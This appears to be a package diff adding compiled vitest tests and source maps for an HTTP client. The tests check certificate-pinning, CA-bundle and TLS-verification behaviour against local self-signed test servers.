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"}

package/dist/http-client.test.d.ts

@@ -0,0 +1,2 @@
+export {};
+//# sourceMappingURL=http-client.test.d.ts.map

package/dist/http-client.test.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"http-client.test.d.ts","sourceRoot":"","sources":["../src/http-client.test.ts"],"names":[],"mappings":""}

package/dist/http-client.test.js

@@ -0,0 +1,175 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const vitest_1 = require("vitest");
+const http_1 = __importDefault(require("http"));
+const https_1 = __importDefault(require("https"));
+const crypto_1 = require("crypto");
+const http_client_1 = require("./http-client");
+// --- fixture: self-signed HTTPS server using a known cert -------------------
+function generateSelfSignedCert() {
+    const { execSync } = require('child_process');
+    const fs = require('fs');
+    const os = require('os');
+    const path = require('path');
+    const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'sentry-tls-'));
+    const keyPath = path.join(dir, 'key.pem');
+    const certPath = path.join(dir, 'cert.pem');
+    try {
+        execSync(`openssl req -x509 -newkey rsa:2048 -nodes -keyout "${keyPath}" -out "${certPath}" -days 1 -subj "/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:127.0.0.1"`, { stdio: 'ignore' });
+    }
+    catch {
+        return { key: '', cert: '', certPath: '', fingerprintSha256: '' };
+    }
+    const key = fs.readFileSync(keyPath, 'utf8');
+    const cert = fs.readFileSync(certPath, 'utf8');
+    const x509 = new crypto_1.X509Certificate(cert);
+    const fingerprintSha256 = (0, crypto_1.createHash)('sha256').update(x509.raw).digest('hex').toUpperCase();
+    return { key, cert, certPath, fingerprintSha256 };
+}
+(0, vitest_1.describe)('http-client / isValidFingerprint', () => {
+    (0, vitest_1.it)('accepts SHA-256 hex with colons', () => {
+        (0, vitest_1.expect)((0, http_client_1.isValidFingerprint)('A1:B2:C3:D4:E5:F6:07:18:29:3A:4B:5C:6D:7E:8F:90:A1:B2:C3:D4:E5:F6:07:18:29:3A:4B:5C:6D:7E:8F:90')).toBe(true);
+    });
+    (0, vitest_1.it)('accepts SHA-256 hex without colons', () => {
+        (0, vitest_1.expect)((0, http_client_1.isValidFingerprint)('a'.repeat(64))).toBe(true);
+    });
+    (0, vitest_1.it)('rejects MD5 / too-short / too-long', () => {
+        (0, vitest_1.expect)((0, http_client_1.isValidFingerprint)('a'.repeat(32))).toBe(false); // MD5 length
+        (0, vitest_1.expect)((0, http_client_1.isValidFingerprint)('a'.repeat(63))).toBe(false);
+        (0, vitest_1.expect)((0, http_client_1.isValidFingerprint)('a'.repeat(65))).toBe(false);
+        (0, vitest_1.expect)((0, http_client_1.isValidFingerprint)('not-a-hex-string-at-all-not-a-hex-string-at-all-not-a-hex-stringg')).toBe(false);
+    });
+});
+(0, vitest_1.describe)('http-client / createSecureAgent', () => {
+    const origEnv = process.env.NODE_ENV;
+    (0, vitest_1.afterAll)(() => { process.env.NODE_ENV = origEnv; });
+    (0, vitest_1.it)('returns undefined for http://', () => {
+        (0, vitest_1.expect)((0, http_client_1.createSecureAgent)({ endpoint: 'http://localhost' })).toBeUndefined();
+    });
+    (0, vitest_1.it)('enables rejectUnauthorized by default for https://', () => {
+        const agent = (0, http_client_1.createSecureAgent)({ endpoint: 'https://example.com' });
+        (0, vitest_1.expect)(agent).toBeTruthy();
+        (0, vitest_1.expect)(agent.options.rejectUnauthorized).toBe(true);
+    });
+    (0, vitest_1.it)('honors allowInsecureTls only outside production', () => {
+        process.env.NODE_ENV = 'test';
+        const agent = (0, http_client_1.createSecureAgent)({ endpoint: 'https://example.com', allowInsecureTls: true });
+        (0, vitest_1.expect)(agent.options.rejectUnauthorized).toBe(false);
+    });
+    (0, vitest_1.it)('coerces rejectUnauthorized to true in production even when caller asks for insecure', () => {
+        process.env.NODE_ENV = 'production';
+        const agent = (0, http_client_1.createSecureAgent)({ endpoint: 'https://example.com', allowInsecureTls: true });
+        (0, vitest_1.expect)(agent.options.rejectUnauthorized).toBe(true);
+    });
+});
+(0, vitest_1.describe)('http-client / secureRequest', () => {
+    let httpServer;
+    let httpsServer = null;
+    let httpPort;
+    let httpsPort;
+    let tlsFingerprint = '';
+    let tlsCertPath = '';
+    let tlsAvailable = false;
+    (0, vitest_1.beforeAll)(async () => {
+        // Plain HTTP server for non-TLS paths
+        httpServer = http_1.default.createServer((req, res) => {
+            res.writeHead(200, { 'Content-Type': 'application/json' });
+            res.end(JSON.stringify({ ok: true, path: req.url, method: req.method }));
+        });
+        await new Promise((resolve) => httpServer.listen(0, '127.0.0.1', () => resolve()));
+        httpPort = httpServer.address().port;
+        // Self-signed HTTPS server for pinning paths
+        const { key, cert, certPath, fingerprintSha256 } = generateSelfSignedCert();
+        if (key && cert) {
+            tlsAvailable = true;
+            tlsFingerprint = fingerprintSha256;
+            tlsCertPath = certPath;
+            httpsServer = https_1.default.createServer({ key, cert }, (req, res) => {
+                res.writeHead(200, { 'Content-Type': 'application/json' });
+                res.end(JSON.stringify({ ok: true, secure: true }));
+            });
+            await new Promise((resolve) => httpsServer.listen(0, '127.0.0.1', () => resolve()));
+            httpsPort = httpsServer.address().port;
+        }
+    });
+    (0, vitest_1.afterAll)(async () => {
+        await new Promise((resolve) => httpServer.close(() => resolve()));
+        if (httpsServer)
+            await new Promise((resolve) => httpsServer.close(() => resolve()));
+    });
+    (0, vitest_1.it)('reaches an http endpoint and parses JSON', async () => {
+        const r = await (0, http_client_1.secureRequest)({ endpoint: `http://127.0.0.1:${httpPort}` }, { path: '/api/v1/ping' });
+        (0, vitest_1.expect)(r.statusCode).toBe(200);
+        (0, vitest_1.expect)(r.parsed.ok).toBe(true);
+        (0, vitest_1.expect)(r.parsed.path).toBe('/api/v1/ping');
+    });
+    (0, vitest_1.it)('forwards body + headers on POST', async () => {
+        const r = await (0, http_client_1.secureRequest)({ endpoint: `http://127.0.0.1:${httpPort}` }, { method: 'POST', path: '/echo', headers: { 'X-Test': 'yes' }, body: { hello: 'world' } });
+        (0, vitest_1.expect)(r.statusCode).toBe(200);
+        (0, vitest_1.expect)(r.parsed.method).toBe('POST');
+    });
+    (0, vitest_1.it)('aborts with a timeout error past the deadline', async () => {
+        // Server that never responds
+        const slowServer = http_1.default.createServer(() => { });
+        await new Promise((resolve) => slowServer.listen(0, '127.0.0.1', () => resolve()));
+        const port = slowServer.address().port;
+        try {
+            await (0, vitest_1.expect)((0, http_client_1.secureRequest)({ endpoint: `http://127.0.0.1:${port}`, timeoutMs: 200 }, { path: '/' })).rejects.toThrow(/timed out/);
+        }
+        finally {
+            slowServer.close();
+        }
+    });
+    (0, vitest_1.it)('rejects self-signed cert when rejectUnauthorized is enabled (default)', async () => {
+        if (!tlsAvailable)
+            return;
+        await (0, vitest_1.expect)((0, http_client_1.secureRequest)({ endpoint: `https://127.0.0.1:${httpsPort}` }, { path: '/api/v1/ping' })).rejects.toThrow();
+    });
+    (0, vitest_1.it)('explains https-to-http protocol mismatches clearly', async () => {
+        await (0, vitest_1.expect)((0, http_client_1.secureRequest)({ endpoint: `https://127.0.0.1:${httpPort}` }, { path: '/api/v1/ping' })).rejects.toThrow(/plain HTTP on an HTTPS URL/);
+    });
+    (0, vitest_1.it)('allows self-signed cert when CA bundle includes it', async () => {
+        if (!tlsAvailable)
+            return;
+        // The fixture cert is self-signed (issuer == subject), so it functions as
+        // its own CA. Pointing caBundlePath at it should let Node trust the chain.
+        const r = await (0, http_client_1.secureRequest)({ endpoint: `https://localhost:${httpsPort}`, caBundlePath: tlsCertPath }, { path: '/api/v1/ping' });
+        (0, vitest_1.expect)(r.statusCode).toBe(200);
+    });
+    (0, vitest_1.it)('rejects on TLS fingerprint mismatch', async () => {
+        if (!tlsAvailable)
+            return;
+        const wrongFingerprint = 'F'.repeat(64);
+        process.env.NODE_ENV = 'test';
+        await (0, vitest_1.expect)((0, http_client_1.secureRequest)({
+            endpoint: `https://127.0.0.1:${httpsPort}`,
+            allowInsecureTls: true, // bypass CA validation so we isolate the pin check
+            pinnedFingerprintSha256: wrongFingerprint,
+        }, { path: '/api/v1/ping' })).rejects.toThrow(/pin mismatch/);
+    });
+    (0, vitest_1.it)('succeeds when pinned fingerprint matches', async () => {
+        if (!tlsAvailable)
+            return;
+        process.env.NODE_ENV = 'test';
+        const r = await (0, http_client_1.secureRequest)({
+            endpoint: `https://127.0.0.1:${httpsPort}`,
+            allowInsecureTls: true, // bypass CA chain check; pin is the source of truth
+            pinnedFingerprintSha256: tlsFingerprint,
+        }, { path: '/api/v1/ping' });
+        (0, vitest_1.expect)(r.statusCode).toBe(200);
+    });
+    (0, vitest_1.it)('refuses an invalid fingerprint format', async () => {
+        if (!tlsAvailable)
+            return;
+        process.env.NODE_ENV = 'test';
+        await (0, vitest_1.expect)((0, http_client_1.secureRequest)({
+            endpoint: `https://127.0.0.1:${httpsPort}`,
+            allowInsecureTls: true,
+            pinnedFingerprintSha256: 'not-a-real-fingerprint',
+        }, { path: '/api/v1/ping' })).rejects.toThrow(/Invalid pinned fingerprint/);
+    });
+});
+//# sourceMappingURL=http-client.test.js.map

package/dist/http-client.test.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"http-client.test.js","sourceRoot":"","sources":["../src/http-client.test.ts"],"names":[],"mappings":"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